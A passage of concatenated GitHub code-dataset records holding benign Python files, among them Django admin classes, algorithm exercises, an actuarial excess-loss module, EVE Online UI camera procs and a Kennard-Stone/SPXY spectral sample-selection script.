print(neighbor)\n g_mirror= []\n for src,dst in zip(g.edges()[0],g.edges()[1]):\n m_srcs = []\n # print(kg.entity_type[dst])\n if kg.entity_type[dst]!='id':\n\n g_mirror.append(m_srcs)\n continue\n # print('src:',src,'dst:',dst)\n n = list(neighbor[dst])\n # print('neighbor of dst:',n)\n n.pop(n.index(src))\n # print('exclusive neighbor of dst',n)\n\n if n:\n m_dsts = get_neighborhood(g, n[0])\n for node in n:\n m_dsts = list(np.intersect1d(m_dsts,get_neighborhood(g, node)))\n if dst in m_dsts:\n m_dsts.pop(m_dsts.index(dst))\n\n for m_dst in m_dsts:\n for j in get_neighborhood(g, m_dst):\n if kg.entity_type[j] == kg.entity_type[src]:\n m_srcs.append(j)\n g_mirror.append(m_srcs)\n # if m_srcs:\n # print(src,dst,m_srcs)\n # print('mirror center:',ce)\n\n # print(\"g_mirror\",g_mirror)\n return np.array(g_mirror, dtype=object)\n","repo_name":"yqyzyaq/CEAM","sub_path":"code/utils/mask.py","file_name":"mask.py","file_ext":"py","file_size_in_byte":5553,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"72095580571","text":"import numpy as np\nimport matplotlib.pyplot as plt\n## EJERCICIO 1\ncero=[]\nuno=[]\ncinco=[]\nfor i in range(10):\n cero.append(0)\n uno.append(1)\n cinco.append(5)\n\na=np.array([cero,uno,cinco])\n#print(a)\n\n\n## EJERCICIO 3\ndef PrintMat(mat):\n \n\n for i in range(np.size(mat, axis=0)):\n for j in range(np.size(mat, axis=1)):\n print(mat[i][j],end=' ')\n print('')\n \n#PrintMat(np.array([(1,2,3,4),(5,6,7,8),(9,0,1,2)]))\n\n\n## EJRCICIO 4\na=np.array([(1,2,3),(5,6,7),(0,1,2)])\n#print(np.linalg.inv(a))\n\n\n## EJERCICIO 5\nciudad=['Liverpool','Manchester','Londres','Cardiff']\npopu=[100,150,500,80]\n\nindex=np.arange(len(ciudad)) #=[0,1,2,3]\n\nplt.scatter(index,popu,color='green')\nplt.bar(index,popu,color='blue')\nplt.xlabel('Population')\nplt.ylabel('City')\n\nplt.xticks(index,ciudad)\n\n#plt.show()\n","repo_name":"Tiagosalco/Struct","sub_path":"Guias/Guia6/Ejs6.py","file_name":"Ejs6.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42074516739","text":"from django.contrib import admin\n\nfrom products.models import (\n Product,\n ProductCategory,\n ProductCategoryFaq,\n ProductFaq,\n ProductImage,\n ProductProvider,\n ProductCategoryImage,\n)\n\n\n@admin.register(ProductCategory)\nclass ProductCategoryAdmin(admin.ModelAdmin):\n list_display = (\n 'title',\n 'sub_title',\n 'priority',\n 'is_active',\n 'is_upcoming',\n 'is_deliverable',\n 'created_at',\n 'updated_at',\n )\n list_filter = (\n 'is_active',\n 'is_upcoming',\n 'is_deliverable',\n 'created_at',\n 'updated_at',\n )\n search_fields = ('title', 'sub_title',)\n readonly_fields = ('slug', )\n\n\n@admin.register(ProductCategoryImage)\nclass ProductCategoryImageAdmin(admin.ModelAdmin):\n list_display = (\n 'category',\n 'image',\n 'is_approved',\n 'created_at',\n 'updated_at',\n )\n list_filter = (\n 'category',\n 'is_approved',\n 'created_at',\n 'updated_at',\n )\n search_fields = ('category__title',)\n\n\n@admin.register(ProductCategoryFaq)\nclass ProductCategoryFaqAdmin(admin.ModelAdmin):\n list_display = (\n 'category',\n 'question',\n 'answer',\n 'created_at',\n 'updated_at',\n )\n list_filter = (\n 'category',\n 'created_at',\n 'updated_at',\n )\n search_fields = ('category__title',)\n\n\n@admin.register(Product)\nclass ProductAdmin(admin.ModelAdmin):\n list_display = (\n 'title',\n 'category',\n 'priority',\n 'price',\n 'offer_price',\n 'is_active',\n 'list_product',\n 'custom_product',\n 'created_at',\n 'updated_at',\n )\n list_filter = (\n 'category',\n 'is_active',\n 'list_product',\n 'custom_product',\n 'created_at',\n 'updated_at',\n )\n search_fields = ('category__title', 'title')\n\n\n@admin.register(ProductImage)\nclass ProductImageAdmin(admin.ModelAdmin):\n list_display = (\n 'product',\n 'image',\n 'is_approved',\n 'created_at',\n 'updated_at',\n )\n list_filter = (\n 'is_approved',\n 'created_at',\n 'updated_at',\n )\n search_fields = ('product__title', )\n\n\n@admin.register(ProductFaq)\nclass ProductFaqAdmin(admin.ModelAdmin):\n list_display = (\n 'product',\n 'question',\n 'answer',\n 'created_at',\n 'updated_at',\n )\n list_filter = (\n 'product',\n 'created_at',\n 'updated_at',\n )\n search_fields = ('product__title',)\n\n\n@admin.register(ProductProvider)\nclass ProductProviderAdmin(admin.ModelAdmin):\n list_display = (\n 'product',\n 'user',\n 'price',\n 'offer_price',\n 'new_offer_price',\n 'is_approved',\n 'created_at',\n 'updated_at',\n )\n list_filter = (\n 'is_approved',\n 'created_at',\n 'updated_at',\n )\n search_fields = (\n 'product__title',\n 'user__first_name',\n 'user__last_name',\n 'user__email',\n 'user__phone',\n )\n","repo_name":"ajaygupta74/django","sub_path":"ecommerce/products/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3131,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"37106019304","text":"import sys\n\nn=int(sys.stdin.readline())\narr=[]\nfor i in range(n):\n arr.append(list(sys.stdin.readline()))\ncolum=0\nrow=0\nfor i in range(n):\n base=0\n for j in range(n):\n if arr[i][j]=='.':\n base+=1\n else:\n if base>=2:\n row+=1\n base=0\n if base>=2:\n row+=1\nfor i in range(n):\n base=0\n for j in range(n):\n if arr[j][i]=='.':\n base+=1\n else:\n if base>=2:\n colum+=1\n base=0\n if base>=2:\n colum+=1\n \nprint(row,colum)\n","repo_name":"styughjvbn/Algorithm_study","sub_path":"week11-20/week16/148_1652.py","file_name":"148_1652.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26432346880","text":"def compare(x, y):\n if x > y:\n print(1)\n elif x == y:\n print(0)\n else:\n print(-1)\n # actual implementation\n\n\nvalue_1 = input(\"Please enter first number: \")\nvalue_2 = input(\"Please enter second number: \")\n\ncompare(value_1, value_2)\n","repo_name":"fibbo/python_basics","sub_path":"previous_courses/21FS_APPE3/exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3585283706","text":"from django.urls import resolve, reverse\nfrom django.db.models import Sum, Avg\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.utils.encoding import smart_str\n\n\ndef build_tabs_dict(request, tabs):\n match = resolve(request.path)\n tab_dict = {}\n for tab,view in tabs.items():\n try:\n view_name, args, kwargs = view\n is_active = match.url_name == view_name\n except ValueError:\n is_active = match.url_name == view\n kwargs = None\n args = []\n view_name = view\n tab_dict[tab] = [reverse(view_name, args=args, kwargs=kwargs), is_active]\n return tab_dict\n\n","repo_name":"wjojf/ngsdb","sub_path":"nlib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43451134813","text":"# SOA Exam GIADV\n# Lee\nfrom sympy import symbols, solve\nimport numpy as np\nclass Excess_Loss_and_Retro_Rating:\n # 1 Introduction\n # Size and Layer\n # G(x) = 1 - F(x)\n\n # 2 Expected Value Premium\n # Increased Limits Coverage\n # Excess of Loss Coverage\n # Losses with Retention and Limit\n \n # 3 Trend\n # Effect of Inflation\n\n def __init__(self): \n self.Layers = []\n self.ExcessAmounts = [] \n self.Trend = 0\n self.TrendFactors = []\n self.Loss_Ratios = np.array\n \n def set_losses_probabilities(self, losses, probabilities): \n self.TrendFactors = []\n for layer, excess in zip(self.Layers, self.ExcessAmounts): \n layerExcessLoss = 0\n trendedLayerExcessLoss = 0\n for loss, prob in zip(losses, probabilities):\n layerExcessLoss += prob * min(max(loss - layer, 0), excess) \n trendedLayerExcessLoss += prob * min(max(loss * (1 + self.Trend) - layer,0), excess) \n #print(f'Trend Factor {trendedLayerExcessLoss / layerExcessLoss}')\n self.TrendFactors.append(trendedLayerExcessLoss / layerExcessLoss) \n\n # The entry ratio: The multiple of a risk’s expected loss or expected loss ratio\n\n\n # 4 Retrospective Rating\n # Table M charge: The average amount by which a risk’s actual loss exceeds r times its expected loss, divided by its expected loss \n # Table L charge: The average amount by which a risk’s actual limited loss exceeds r times its expected loss, divided by its expected loss\n def Φ(self, r, k = 0):\n avg_loss_ratio = self.Loss_Ratios.mean() / (1 - k) \n expected_excess = (self.Loss_Ratios - r * avg_loss_ratio).clip(0,1) \n return expected_excess.mean() / avg_loss_ratio + k # add loss_elimination_ratio, k\n\n # Table M saving: The average amount by which a risk’s actual loss falls short of r times its expected loss, divided by its expected loss\n # Table L saving: The average amount by which a risk’s actual limited loss falls short of r times its expected loss, divided by its expected loss\n def Ψ(self, r, k = 0):\n avg_loss_ratio = self.Loss_Ratios.mean() / (1 - k) \n expected_saving = (r * avg_loss_ratio - self.Loss_Ratios).clip(0,1) \n return expected_saving.mean() / avg_loss_ratio \n\n \n def workers_compensation_retro_rating(self):\n b = symbols('basic premium') \n B = symbols('basic premium ratio')\n P = symbols('premium')\n\n b = B * P\n \n R = symbols('retro rating')\n C = symbols('loss conversion factor (LCF)')\n L = symbols('loss')\n\n R = b + C * L\n\n G = symbols('max premium')\n H = symbols('min premium')\n E = symbols('expected loss')\n L_G = symbols('max loss')\n L_H = symbols('min loss')\n\n G = b + C * L_G\n r_G = L_G / E\n\n H = b + C * L_H\n r_H = L_H / E\n\n I = symbols('the net insurance chart of Table M')\n \n \n # 5 Conclusion","repo_name":"LittleBigGene/SOA_Advanced-Topics-in-General-Insurance-Exam","sub_path":"3 Excess of Loss Coverages and Retrospectiva Rating/Excess_Loss_and_Retro_Rating.py","file_name":"Excess_Loss_and_Retro_Rating.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27339955572","text":"import time\n\n\nclass Solution:\n def firstLastInList(self, nums, target):\n first = self.binarySearch2(nums, 0, len(nums) - 1, target, True)\n last = self.binarySearch2(nums, 0, len(nums)-1, target, False)\n return [first, last]\n\n def binarySearch(self, nums, low, high, target, isFirst):\n index = None\n while low < high:\n midIndex = (high + low) // 2\n if(target == nums[midIndex]):\n if isFirst:\n index = midIndex\n high = midIndex - 1\n else:\n index = midIndex\n low = midIndex + 1\n elif target > nums[midIndex]:\n low = midIndex + 1\n else:\n high = midIndex - 1\n return index\n\n def binarySearchRe(self, nums, low, high, target, isFirst):\n if low > high:\n return -1\n midIndex = (high + low) // 2\n if(isFirst):\n if(midIndex == 0 or nums[midIndex] == target and nums[midIndex] > nums[midIndex - 1]):\n return midIndex\n if target > nums[midIndex]:\n return self.binarySearch(nums, midIndex + 1, high, target, isFirst)\n else:\n return self.binarySearch(nums, low, midIndex - 1, target, isFirst)\n else:\n if(midIndex == len(nums) - 1 or nums[midIndex] == target and target < nums[midIndex+1]):\n return midIndex\n elif target < nums[midIndex]:\n return self.binarySearch(nums, low, midIndex - 1, target, False)\n else:\n return self.binarySearch(nums, midIndex + 1, high, target, False)\n\n def binarySearch2(self, nums, low, high, target, isFirst):\n while True:\n if high < low:\n return -1\n midIndex = (high + low) // 2\n if isFirst:\n if(midIndex == 0 or nums[midIndex] == target and nums[midIndex] > nums[midIndex - 1]):\n return midIndex\n if target > nums[midIndex]:\n low = midIndex + 1\n else:\n high = midIndex - 1\n else:\n if(midIndex == len(nums) - 1 or nums[midIndex] == target and target < nums[midIndex+1]):\n return midIndex\n elif target < nums[midIndex]:\n high = midIndex - 1\n else:\n low = midIndex + 1\n\n\n# a sorted list\na = [1, 2, 3, 5, 7, 9, 18]\nprint(Solution().firstLastInList(a, 7))\n","repo_name":"liuuu/python-algorithm","sub_path":"5.first_last_in_list.py","file_name":"5.first_last_in_list.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"25514761066","text":"\n\n''''\n\n743. Network Delay Time\n\nYou are given a network of n nodes, labeled from 1 to n. You are also given times, a list of travel times as directed edges times[i] = (ui, vi, wi), where ui is the source node, vi is the target node, and wi is the time it takes for a signal to travel from source to target.\n\nWe will send a signal from a given node k. Return the time it takes for all the n nodes to receive the signal. If it is impossible for all the n nodes to receive the signal, return -1.\n'''\n\n\nclass Solution:\n def networkDelayTime(self, times: List[List[int]], n: int, k: int) -> int:\n\n # Create an edges variable that will store the edges their weight and value\n edges = collections.defaultdict(list)\n\n for u, v, w in times: # Loop through all vars in times and add it to our default dic\n edges[u].append((v, w)) # Node 2 -> 1 has a weight of 1\n\n minHeap = [(0, k)] # Init minheap with 0 cost and source node given\n visit = set() # Are visited nodes will be tracked in a set\n t = 0 # Our min total for each node to be reached\n\n while minHeap: # Continue this algorithm while our minHeap is not null\n # pop from the minheap and store it as weight 1 and node 1\n w1, n1 = heapq.heappop(minHeap)\n if n1 in visit: # If node has been visited we want to continue\n continue\n\n visit.add(n1) # Else we want to add node into our visited set\n # our total is equal to the max between what t currently is and the weight from our current node\n t = max(t, w1)\n\n for n2, w2 in edges[n1]: # Now we check neighboring edges of the node we are on\n if n2 not in visit: # If neighbor node is not in visit\n # We add the node into our minHeap and add its weight AND the weight of the previous node that we used to get here\n heapq.heappush(minHeap, (w1 + w2, n2))\n return t if len(visit) == n else -1\n '''At the end of our loop we want to return t which stores our shortest path\n if the length of visit is equal to n which stores our total nodes. If it is \n equal we have completed our algorithim and we have visited each node. If it \n is not equal it means one or more nodes were not reached and we return -1\n '''\n","repo_name":"shayanvalaie/leetcode_sample","sub_path":"743_network_delay_time.py","file_name":"743_network_delay_time.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33636804493","text":"#Embedded file name: c:/depot/games/branches/release/EVE-TRANQUILITY/carbon/client/script/ui/uiProcs.py\nimport cameras\nimport GameWorld\nimport service\nimport zaction\n\nclass UIProcSvc(service.Service):\n __guid__ = 'svc.uiProcSvc'\n __machoresolve__ = 'location'\n __dependencies__ = ['cameraClient']\n\n def Run(self, *args):\n service.Service.Run(self, *args)\n GameWorld.RegisterPythonActionProc('PerformPythonUICallback', self._PerformUICallback, ('callbackKey',))\n GameWorld.RegisterPythonActionProc('PlayEntityAudio', self._PlayEntityAudio, ('audioName', 'mls', 'TargetList'))\n GameWorld.RegisterPythonActionProc('PlayTutorialVoiceover', self._PlayTutorialVoiceOver, ('messageKey',))\n GameWorld.RegisterPythonActionProc('PushCameraWithTransition', self._PushCameraWithTransition, ('cameraName', 'behaviorNames', 'transitionSeconds', 'startHeight', 'TargetList'))\n GameWorld.RegisterPythonActionProc('PopCameraWithTransition', self._PopCameraWithTransition, ('transitionSeconds', 'retainYaw', 'retainPitch'))\n\n def _PushCameraWithTransition(self, cameraName, behaviorNames, transitionSeconds, startHeight, targetList):\n entity = self.entityService.FindEntityByID(targetList[0])\n cameraClass = getattr(cameras, cameraName)\n camera = cameraClass()\n camera.pushUp = startHeight\n if hasattr(camera, 'SetEntity'):\n camera.SetEntity(entity)\n names = behaviorNames.split(',')\n for name in names:\n name = name.replace(' ', '')\n if len(name):\n behaviorClass = getattr(cameras, name)\n behavior = behaviorClass()\n camera.AddBehavior(behavior)\n\n transition = cameras.LinearTransitionBehavior(transitionSeconds=float(transitionSeconds))\n self.cameraClient.PushActiveCamera(camera, transitionBehaviors=[transition])\n return True\n\n def _PopCameraWithTransition(self, transitionSeconds, retainYaw, retainPitch):\n activeCamera = self.cameraClient.GetActiveCamera()\n cameraStack = self.cameraClient.GetCameraStack()\n comingActiveCamera = None\n try:\n comingActiveCamera = cameraStack[-2]\n except IndexError:\n comingActiveCamera = None\n\n if comingActiveCamera:\n if retainYaw:\n comingActiveCamera.SetYaw(activeCamera.yaw)\n if retainPitch:\n comingActiveCamera.SetPitch(activeCamera.pitch)\n transition = cameras.LinearTransitionBehavior(transitionSeconds=float(transitionSeconds))\n self.cameraClient.PopActiveCamera(transitionBehaviors=[transition])\n return True\n\n def _PerformUICallback(self, callbackKey):\n raise NotImplementedError('Each game must implement a _PerformUICallback that works with its UI.')\n\n def _PlayEntityAudio(self, audioName, mls, targetList):\n if mls:\n message = cfg.GetMessage(audioName)\n audioName = message.audio\n if audioName.startswith('wise:/'):\n audioName = audioName[6:]\n for entityID in targetList:\n entity = self.entityService.FindEntityByID(entityID)\n audioComponent = entity.GetComponent('audioEmitter')\n if audioComponent:\n audioComponent.emitter.SendEvent(unicode(audioName))\n else:\n self.LogWarn('Entity with ID %s has no audio component. Audio file %s cannot be played from this entity.' % (entityID, audioName))\n\n return True\n\n def _PlayTutorialVoiceOver(self, messageKey):\n sm.GetService('tutorial').Action_Play_MLS_Audio(messageKey)\n return True\n\n\nexports = {'actionProcTypes.PerformPythonUICallback': zaction.ProcTypeDef(isMaster=True, procCategory='UI', properties=[zaction.ProcPropertyTypeDef('callbackKey', 'S', userDataType=None, isPrivate=True)], description='Performs a UI callback (opens a UI window, etc.). These are set per-game.'),\n 'actionProcTypes.PlayEntityAudio': zaction.ProcTypeDef(isMaster=True, procCategory='Audio', properties=[zaction.ProcPropertyTypeDef('audioName', 'S', userDataType=None, isPrivate=True, displayName='Audio Name'), zaction.ProcPropertyTypeDef('mls', 'B', userDataType=None, isPrivate=True, displayName='MLS')], description='Plays location-based audio at the location of the *target* entity.'),\n 'actionProcTypes.PlayTutorialVoiceover': zaction.ProcTypeDef(isMaster=True, procCategory='Audio', properties=[zaction.ProcPropertyTypeDef('messageKey', 'S', userDataType=None, isPrivate=True, displayName='MLS Message Key')], description='Plays the specified tutorial voiceover.'),\n 'actionProcTypes.PushCameraWithTransition': zaction.ProcTypeDef(isMaster=True, procCategory='Camera', properties=[zaction.ProcPropertyTypeDef('cameraName', 'S', userDataType=None, isPrivate=True, displayName='Camera Class Name'),\n zaction.ProcPropertyTypeDef('behaviorNames', 'S', userDataType=None, isPrivate=True, displayName='Behavior Class Names (comma separ.)'),\n zaction.ProcPropertyTypeDef('transitionSeconds', 'F', userDataType=None, isPrivate=True, displayName='Transition Seconds'),\n zaction.ProcPropertyTypeDef('startHeight', 'F', userDataType=None, isPrivate=True, displayName='Start Height From Floor')], description='Pushes a new camera onto the camera stack. THIS MAY BE DEPRECATED.'),\n 'actionProcTypes.PopCameraWithTransition': zaction.ProcTypeDef(isMaster=True, procCategory='Camera', properties=[zaction.ProcPropertyTypeDef('transitionSeconds', 'F', userDataType=None, isPrivate=True, displayName='Transition Seconds'), zaction.ProcPropertyTypeDef('retainYaw', 'B', userDataType=None, isPrivate=True, displayName='Retain yaw between cameras'), zaction.ProcPropertyTypeDef('retainPitch', 'B', userDataType=None, isPrivate=True, displayName='Retain pitch between cameras')], description='Pops a camera off the camera stack with a transition. THIS MAY BE DEPRECATED.')}","repo_name":"alexcmd/eve","sub_path":"eve-8.21.494548/carbon/client/script/ui/uiProcs.py","file_name":"uiProcs.py","file_ext":"py","file_size_in_byte":6072,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"14341676511","text":"'''\nSample selection using Kennard-Stone algorithm and SPXY algorithm\ncode adapted from https://hxhc.xyz/post/kennardstone-spxy/#spxy-split\nAlgorithm based on\nGalvao, Roberto Kawakami Harrop, et al. \"A method for calibration and validation subset partitioning.\" Talanta 67.4 (2005): 736-740.\nLi, Wenze, et al. \"HSPXY: A hybrid‐correlation and diversity‐distances based data partition method.\" Journal of Chemometrics 33.4 (2019): e3109\n'''\n\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom scipy.spatial.distance import cdist\n\n\ndef random_split(spectra, test_size=0.25, random_state=None, shuffle=True, stratify=None):\n \"\"\"implement random_split by using sklearn.model_selection.train_test_split function. See\n http://scikit-learn.org/stable/modules/generated/sklearn.model_selection.train_test_split.html\n for more infomation.\n \"\"\"\n return train_test_split(\n spectra,\n test_size=test_size,\n random_state=random_state,\n shuffle=shuffle,\n stratify=stratify)\n\n\ndef kennardstone(spectra, test_size=0.25, metric='euclidean', *args, **kwargs):\n \"\"\"Kennard Stone Sample Split method\n Parameters\n ----------\n spectra: ndarray, shape of i x j\n i spectrums and j variables (wavelength/wavenumber/ramam shift and so on)\n test_size : float, int\n if float, then round(i x (1-test_size)) spectrums are selected as test data, by default 0.25\n if int, then test_size is directly used as test data size\n metric : str, optional\n The distance metric to use, by default 'euclidean'\n See scipy.spatial.distance.cdist for more infomation\n Returns\n -------\n select_pts: list\n index of selected spetrums as train data, index is zero based\n remaining_pts: list\n index of remaining spectrums as test data, index is zero based\n References\n --------\n Kennard, R. W., & Stone, L. A. (1969). Computer aided design of experiments.\n Technometrics, 11(1), 137-148. (https://www.jstor.org/stable/1266770)\n \"\"\"\n\n if test_size < 1:\n train_size = round(spectra.shape[0] * (1 - test_size))\n else:\n train_size = spectra.shape[0] - round(test_size)\n\n if train_size > 2:\n distance = cdist(spectra, spectra, metric=metric, *args, **kwargs)\n select_pts, remaining_pts = max_min_distance_split(distance, train_size)\n else:\n raise ValueError(\"train sample size should be at least 2\")\n\n return select_pts, remaining_pts\n\n\ndef spxy(spectra, yvalues, test_size=0.25, metric='euclidean', *args, **kwargs):\n \"\"\"SPXY Sample Split method\n Parameters\n ----------\n spectra: ndarray, shape of i x j\n i spectrums and j variables (wavelength/wavenumber/ramam shift and so on)\n test_size : float, int\n if float, then round(i x (1-test_size)) spectrums are selected as test data, by default 0.25\n if int, then test_size is directly used as test data size\n metric : str, optional\n The distance metric to use, by default 'euclidean'\n See scipy.spatial.distance.cdist for more infomation\n Returns\n -------\n select_pts: list\n index of selected spetrums as train data, index is zero based\n remaining_pts: list\n index of remaining spectrums as test data, index is zero based\n References\n ---------\n Galvao et al. (2005). A method for calibration and validation subset partitioning.\n Talanta, 67(4), 736-740. (https://www.sciencedirect.com/science/article/pii/S003991400500192X)\n \"\"\"\n\n if test_size < 1:\n train_size = round(spectra.shape[0] * (1 - test_size))\n else:\n train_size = spectra.shape[0] - round(test_size)\n\n if train_size > 2:\n yvalues = yvalues.reshape(yvalues.shape[0], -1)\n distance_spectra = cdist(spectra, spectra, metric=metric, *args, **kwargs)\n distance_y = cdist(yvalues, yvalues, metric=metric, *args, **kwargs)\n distance_spectra = distance_spectra / distance_spectra.max()\n distance_y = distance_y / distance_y.max()\n\n distance = distance_spectra + distance_y\n select_pts, remaining_pts = max_min_distance_split(distance, train_size)\n else:\n raise ValueError(\"train sample size should be at least 2\")\n\n return select_pts, remaining_pts\n\n\ndef max_min_distance_split(distance, train_size):\n \"\"\"sample set split method based on maximun minimun distance, which is the core of Kennard Stone\n method\n Parameters\n ----------\n distance : distance matrix\n semi-positive real symmetric matrix of a certain distance metric\n train_size : train data sample size\n should be greater than 2\n Returns\n -------\n select_pts: list\n index of selected spetrums as train data, index is zero-based\n remaining_pts: list\n index of remaining spectrums as test data, index is zero-based\n \"\"\"\n\n select_pts = []\n remaining_pts = [x for x in range(distance.shape[0])]\n\n # first select 2 farthest points\n first_2pts = np.unravel_index(np.argmax(distance), distance.shape)\n select_pts.append(first_2pts[0])\n select_pts.append(first_2pts[1])\n\n # remove the first 2 points from the remaining list\n remaining_pts.remove(first_2pts[0])\n remaining_pts.remove(first_2pts[1])\n\n for i in range(train_size - 2):\n # find the maximum minimum distance\n select_distance = distance[select_pts, :]\n min_distance = select_distance[:, remaining_pts]\n min_distance = np.min(min_distance, axis=0)\n max_min_distance = np.max(min_distance)\n\n # select the first point (in case that several distances are the same, choose the first one)\n points = np.argwhere(select_distance == max_min_distance)[:, 1].tolist()\n for point in points:\n if point in select_pts:\n pass\n else:\n select_pts.append(point)\n remaining_pts.remove(point)\n break\n return select_pts, remaining_pts\n\n\n## main:\ndir_spec = r'D:\\GoogleDrive\\Projects_ongoing\\shift\\data\\spectra\\OD'\ndir_t = r'D:\\GoogleDrive\\Projects_ongoing\\shift\\data\\traits'\ndir_out =r'D:\\GoogleDrive\\Projects_ongoing\\shift\\data\\meta'\n\ndf_t = pd.read_csv(f'{dir_t}/shift_DS_Predict_NEON_v3.csv')\ndf_spec = pd.read_csv(f'{dir_spec}/ovendried_spectra_sample_mean.csv')\n\n## parse the sample ID, exclude NPVs\ndir_in = r'D:\\GoogleDrive\\Projects_ongoing\\shift\\data\\meta'\n# df_sample = pd.read_csv(f'{dir_in}/processed/sample_list_simplified.csv')\ndf_iform = pd.read_csv(f'{dir_in}/processed/sample_list_simplified_ORNL_v3.csv', encoding='unicode_escape')\ndf_inv = pd.read_csv(f'{dir_in}/processed/SHIFT_sample_inventory_20230308.csv')\n# Clean the df_inv\ndf_inv = df_inv[df_inv['Sample Number'] != '131_flower']\ndf_inv = df_inv[df_inv['Sample Number'] != '161_S'].reset_index(drop=True)\nn_inv = df_inv['Sample Number'].unique().astype(int)\nn_inv_OD = df_inv.loc[(df_inv['Type']=='OD') | (df_inv['Type']=='BK'), 'Sample Number'].unique().astype(int)\n# match the spec sample with inv\nsample_n = df_spec['sample_ID'].str.split('_').str.get(1).astype(int)\ndiff_spec2inv = set(sample_n).difference(n_inv) # {1824, 1678, 531, 1689, 1693, 1694}\ndiff_inv2spec = set(n_inv_OD).difference(sample_n) # { 551, 40, 1601, 71, 174, 1776, 755, 1859, 335, 336, 346, 374, 376, 449, 451, 1012}\n\n# filter out NPV based on df_iform\nspec_meta = pd.DataFrame(df_spec['sample_ID'])\nspec_meta['Sample Number'] = sample_n\nNPV = df_iform.loc[(df_iform['Species or type'] == 'NPV') & (df_iform['Sample Taken?'] == 'Yes'), 'Sample Number']\n# filter out flower/seeds/full senescence samples\n# clean the phenophase column\ndf_iform['Pheno'] = df_iform['Phenophase (if rare flowers or seeds, add as multi-select - if sampling flowers separately, add new entry)'].str.split(',').str.get(0)\ndropV = df_iform.loc[(df_iform['Pheno'] == 'Flowers') | (df_iform['Pheno'] == 'Full senescence') | (df_iform['Pheno'] == 'Seeds'), 'Sample Number']\n# drop nan and convert to int\nNPV = list(NPV[~NPV.isna()].astype(int))\n# find bulk from inventory\nBK = df_inv.loc[df_inv['Type']=='BK', 'Sample Number'].unique().astype(int)\n# no scan list from Natalie\ndf_noScan = pd.read_csv(f'{dir_out}/Lists_from_others/sample_no_LMA_scans.csv')\nnoScan = df_noScan['no scans'].astype(int)\n\ndrop_ls = NPV + list(dropV[~dropV.isna()].astype(int)) + list(BK) + list(noScan)\nidx = ~spec_meta['Sample Number'].isin(drop_ls)\nspec_meta_veg = spec_meta[idx].reset_index(drop=True)\nspec_veg = df_spec[idx].iloc[:, 1:].values\n\n\n# select and match the corresponding traits\ntrait_ls = ['Cellulose', 'Fiber', 'Lignin', 'Nitrogen', 'Calcium', 'NSC', 'Phenolics']\ntrait_m = [x + '_M' for x in trait_ls]\n\ntraits = df_t.loc[idx, trait_m].values\n\n# select 200 samples\nratio = 1 - 200/spec_veg.shape[0]\n\nx_train_index, x_test_index = kennardstone(spec_veg, test_size=ratio)\n\nspec_ls = spec_meta_veg.iloc[x_train_index, :]\n\n\n# combine spec and traits\n# remove the traits record with nan\nidx_t = ~np.isnan(traits).any(axis=1)\nratio = 1 - 200/spec_veg[idx_t, :].shape[0]\nx_train_index, x_test_index = spxy(spec_veg[idx_t, :], traits[idx_t, :], test_size=ratio)\n\nspec_meta_veg_sub = spec_meta_veg[idx_t].reset_index(drop=True)\nspec_t_ls = spec_meta_veg_sub.iloc[x_train_index, :]\ncommon_n = set(spec_ls['Sample Number']).intersection(set(spec_t_ls['Sample Number']))\ncommon_ls = spec_ls[spec_ls['Sample Number'].isin(common_n)]\n# perform join to get more info\n\nspec_ls_meta = spec_ls.merge(df_iform, how='left', on='Sample Number')\nspec_t_ls_meta = spec_t_ls.merge(df_iform, how='left', on='Sample Number')\ncommon_ls_meta = common_ls.merge(df_iform, how='left', on='Sample Number')\n\n# add more info from Elsa and wetland\ndf_elsa = pd.read_csv(f'{dir_out}/Lists_from_others/SHIFT_UCLA_JPL_Sample_IDs.csv')\ndf_wetland = pd.read_csv(f'{dir_out}/Lists_from_others/SHIFT_wetland_samples_Silva.csv')\ndf_wetland.rename(columns={'sample_id': 'Sample Number'}, inplace=True)\ndf_elsa.rename(columns={'JPL_sample_ID': 'Sample Number'}, inplace=True)\n\nspec_ls_meta = spec_ls_meta.merge(df_elsa.loc[:, ['Sample Number', 'species_code']].drop_duplicates(), how='left', on='Sample Number')\nspec_ls_meta = spec_ls_meta.merge(df_wetland.loc[:, ['Sample Number', 'species']].drop_duplicates(), how='left', on='Sample Number')\n\nspec_t_ls_meta = spec_t_ls_meta.merge(df_elsa.loc[:, ['Sample Number', 'species_code']].drop_duplicates(), how='left', on='Sample Number')\nspec_t_ls_meta = spec_t_ls_meta.merge(df_wetland.loc[:, ['Sample Number', 'species']].drop_duplicates(), how='left', on='Sample Number')\n\ncommon_ls_meta = common_ls_meta.merge(df_elsa.loc[:, ['Sample Number', 'species_code']].drop_duplicates(), how='left', on='Sample Number')\ncommon_ls_meta = common_ls_meta.merge(df_wetland.loc[:, ['Sample Number', 'species']].drop_duplicates(), how='left', on='Sample Number')\n\nspec_ls_meta.to_csv(f'{dir_out}/selected_sample_list_based_on_dryspec_v2.csv', index=False)\nspec_t_ls_meta.to_csv(f'{dir_out}/selected_sample_list_based_on_dryspec_traits_v2.csv', 